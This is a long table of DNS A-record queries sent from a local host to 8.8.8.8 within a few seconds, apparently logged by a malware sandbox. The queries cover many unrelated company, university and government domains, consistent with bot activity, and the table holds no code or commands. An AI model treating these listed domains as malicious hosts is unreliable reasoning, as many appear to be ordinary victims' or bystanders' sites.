                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.171580076 CET192.168.2.58.8.8.80x1cc8Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.235551119 CET192.168.2.58.8.8.80x4841Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.278948069 CET192.168.2.58.8.8.80xad26Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.314491034 CET192.168.2.58.8.8.80xda4dStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.395981073 CET192.168.2.58.8.8.80x3476Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.401413918 CET192.168.2.58.8.8.80xa58Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.418404102 CET192.168.2.58.8.8.80x2b36Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.430900097 CET192.168.2.58.8.8.80x2667Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.479108095 CET192.168.2.58.8.8.80x732Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.496664047 CET192.168.2.58.8.8.80x3361Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.503252029 CET192.168.2.58.8.8.80xdf20Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.543267965 CET192.168.2.58.8.8.80x5bbStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.558621883 CET192.168.2.58.8.8.80x2d4eStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.559721947 CET192.168.2.58.8.8.80xac0Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.629595041 CET192.168.2.58.8.8.80xc348Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.634191990 CET192.168.2.58.8.8.80x43a0Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.647768974 CET192.168.2.58.8.8.80x6f63Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.660454035 CET192.168.2.58.8.8.80x1caeStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.660571098 CET192.168.2.58.8.8.80xb88aStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.661647081 CET192.168.2.58.8.8.80xb32Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.661741972 CET192.168.2.58.8.8.80x36cdStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.668667078 CET192.168.2.58.8.8.80x98c3Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.670208931 CET192.168.2.58.8.8.80xbfb6Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.673659086 CET192.168.2.58.8.8.80x5c1cStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.727577925 CET192.168.2.58.8.8.80x32aStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.733288050 CET192.168.2.58.8.8.80xf6e2Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.734908104 CET192.168.2.58.8.8.80x143Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.781461954 CET192.168.2.58.8.8.80x6a1eStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.790524960 CET192.168.2.58.8.8.80x60e6Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.818191051 CET192.168.2.58.8.8.80x289aStandard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.825289965 CET192.168.2.58.8.8.80x9870Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.828511953 CET192.168.2.58.8.8.80xc631Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.831722975 CET192.168.2.58.8.8.80x2dadStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.852652073 CET192.168.2.58.8.8.80xbe53Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.854763031 CET192.168.2.58.8.8.80x4ab4Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.857122898 CET192.168.2.58.8.8.80xa3eaStandard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.916356087 CET192.168.2.58.8.8.80xd0b0Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.941895962 CET192.168.2.58.8.8.80x7f2fStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.945400000 CET192.168.2.58.8.8.80x95c9Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.948050976 CET192.168.2.58.8.8.80xfc17Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.963376045 CET192.168.2.58.8.8.80x89e2Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.994726896 CET192.168.2.58.8.8.80xe06dStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.059808016 CET192.168.2.58.8.8.80xef6cStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.072770119 CET192.168.2.58.8.8.80x7f9fStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.153739929 CET192.168.2.58.8.8.80x43edStandard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.247351885 CET192.168.2.58.8.8.80x2935Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.251102924 CET192.168.2.58.8.8.80x641bStandard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.251485109 CET192.168.2.58.8.8.80x4e42Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.255999088 CET192.168.2.58.8.8.80x4841Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.286884069 CET192.168.2.58.8.8.80xcfc8Standard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.291228056 CET192.168.2.58.8.8.80x656eStandard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.291491985 CET192.168.2.58.8.8.80xcf86Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.291940928 CET192.168.2.58.8.8.80x56caStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.301018953 CET192.168.2.58.8.8.80x946eStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.313117981 CET192.168.2.58.8.8.80x5b3bStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.374866009 CET192.168.2.58.8.8.80x50f7Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.396795034 CET192.168.2.58.8.8.80x7957Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.397907972 CET192.168.2.58.8.8.80x2b93Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.411324024 CET192.168.2.58.8.8.80x38deStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.470763922 CET192.168.2.58.8.8.80x516Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.500585079 CET192.168.2.58.8.8.80xea6aStandard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.516453981 CET192.168.2.58.8.8.80x8491Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.518271923 CET192.168.2.58.8.8.80x7158Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.535675049 CET192.168.2.58.8.8.80x1092Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.594052076 CET192.168.2.58.8.8.80x8ac9Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.597137928 CET192.168.2.58.8.8.80x5bbStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.610586882 CET192.168.2.58.8.8.80xc5f8Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.612984896 CET192.168.2.58.8.8.80x7a57Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.631562948 CET192.168.2.58.8.8.80x55c8Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.632618904 CET192.168.2.58.8.8.80x28e1Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.635297060 CET192.168.2.58.8.8.80xdbbcStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.659704924 CET192.168.2.58.8.8.80xedadStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.662717104 CET192.168.2.58.8.8.80xf2d9Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.695478916 CET192.168.2.58.8.8.80x2d13Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.703593016 CET192.168.2.58.8.8.80xb206Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.847620964 CET192.168.2.58.8.8.80x23c3Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.862128019 CET192.168.2.58.8.8.80x60bbStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.922060966 CET192.168.2.58.8.8.80x8602Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.923521042 CET192.168.2.58.8.8.80xa173Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.940505028 CET192.168.2.58.8.8.80xcb8dStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.985666037 CET192.168.2.58.8.8.80xf2f6Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.986593962 CET192.168.2.58.8.8.80xe717Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.024034977 CET192.168.2.58.8.8.80x9d50Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.044486046 CET192.168.2.58.8.8.80x51c2Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.154979944 CET192.168.2.58.8.8.80x1974Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.198420048 CET192.168.2.58.8.8.80xab19Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.342586994 CET192.168.2.58.8.8.80xeb5dStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.357413054 CET192.168.2.58.8.8.80xb3e7Standard query (0)mail.airmail.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.359778881 CET192.168.2.58.8.8.80xef5aStandard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.373703957 CET192.168.2.58.8.8.80x2eb0Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.375910044 CET192.168.2.58.8.8.80xc7c4Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.379503012 CET192.168.2.58.8.8.80x3820Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.395243883 CET192.168.2.58.8.8.80x12f0Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.396275997 CET192.168.2.58.8.8.80xee8aStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.408642054 CET192.168.2.58.8.8.80x20a6Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.502305984 CET192.168.2.58.8.8.80x8dbcStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.510534048 CET192.168.2.58.8.8.80xd4dfStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.513577938 CET192.168.2.58.8.8.80xb2b4Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.525741100 CET192.168.2.58.8.8.80xd22Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.700758934 CET192.168.2.58.8.8.80xbbbStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.717691898 CET192.168.2.58.8.8.80x6b8eStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.803158045 CET192.168.2.58.8.8.80xd609Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.841571093 CET192.168.2.58.8.8.80xac72Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:48.919739962 CET192.168.2.58.8.8.80xf62eStandard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.028723955 CET192.168.2.58.8.8.80x5fccStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.047656059 CET192.168.2.58.8.8.80x208aStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.142956972 CET192.168.2.58.8.8.80xa7c5Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.154695988 CET192.168.2.58.8.8.80xfb40Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.155082941 CET192.168.2.58.8.8.80xdb56Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.188713074 CET192.168.2.58.8.8.80x829bStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.226541042 CET192.168.2.58.8.8.80x178fStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.257985115 CET192.168.2.58.8.8.80x5888Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.331557989 CET192.168.2.58.8.8.80xa8ddStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.336198092 CET192.168.2.58.8.8.80x7f39Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.384687901 CET192.168.2.58.8.8.80xb01fStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.388459921 CET192.168.2.58.8.8.80xea9bStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.409141064 CET192.168.2.58.8.8.80xad8bStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.432466030 CET192.168.2.58.8.8.80x5309Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.469203949 CET192.168.2.58.8.8.80x5f90Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.480010033 CET192.168.2.58.8.8.80x4140Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.488292933 CET192.168.2.58.8.8.80x1660Standard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.490732908 CET192.168.2.58.8.8.80xb667Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.517118931 CET192.168.2.58.8.8.80x99a7Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.519979954 CET192.168.2.58.8.8.80x754eStandard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.529270887 CET192.168.2.58.8.8.80xd406Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.571296930 CET192.168.2.58.8.8.80x5eb5Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.601588011 CET192.168.2.58.8.8.80x5224Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.608030081 CET192.168.2.58.8.8.80xdadbStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.611320019 CET192.168.2.58.8.8.80x5bbStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.635008097 CET192.168.2.58.8.8.80x6533Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.667820930 CET192.168.2.58.8.8.80xbdb6Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.672924995 CET192.168.2.58.8.8.80x5e49Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.687251091 CET192.168.2.58.8.8.80x54ccStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.728131056 CET192.168.2.58.8.8.80xec15Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.820077896 CET192.168.2.58.8.8.80x3e75Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.891796112 CET192.168.2.58.8.8.80x8387Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.911098957 CET192.168.2.58.8.8.80x353dStandard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.915874958 CET192.168.2.58.8.8.80x2e80Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.928859949 CET192.168.2.58.8.8.80xfff7Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:49.946418047 CET192.168.2.58.8.8.80x16a6Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.013046026 CET192.168.2.58.8.8.80xb4d8Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.034919977 CET192.168.2.58.8.8.80x4e24Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.037059069 CET192.168.2.58.8.8.80x298cStandard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.104860067 CET192.168.2.58.8.8.80x31aaStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.208817959 CET192.168.2.58.8.8.80xb50cStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.222316027 CET192.168.2.58.8.8.80xc873Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.267394066 CET192.168.2.58.8.8.80x8cd7Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.278369904 CET192.168.2.58.8.8.80x3a0fStandard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.286222935 CET192.168.2.58.8.8.80x6045Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.287717104 CET192.168.2.58.8.8.80x4133Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.324107885 CET192.168.2.58.8.8.80xe24eStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.338076115 CET192.168.2.58.8.8.80x9b56Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.377026081 CET192.168.2.58.8.8.80xb228Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.441170931 CET192.168.2.58.8.8.80xee39Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.563818932 CET192.168.2.58.8.8.80x354bStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.565865993 CET192.168.2.58.8.8.80x8aadStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.568461895 CET192.168.2.58.8.8.80x4a2bStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.584769011 CET192.168.2.58.8.8.80x2916Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.596312046 CET192.168.2.58.8.8.80x4773Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.705713034 CET192.168.2.58.8.8.80x7c67Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.718532085 CET192.168.2.58.8.8.80xa18aStandard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:50.912658930 CET192.168.2.58.8.8.80x5ea4Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.040970087 CET192.168.2.58.8.8.80xb528Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.045063972 CET192.168.2.58.8.8.80x250fStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.075218916 CET192.168.2.58.8.8.80xa273Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.087954998 CET192.168.2.58.8.8.80xaaefStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.091192961 CET192.168.2.58.8.8.80xa56cStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.136776924 CET192.168.2.58.8.8.80xa8f3Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.184467077 CET192.168.2.58.8.8.80x6e65Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.264749050 CET192.168.2.58.8.8.80x63d3Standard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.384119034 CET192.168.2.58.8.8.80x8c76Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:51.486680031 CET192.168.2.58.8.8.80x6cfcStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
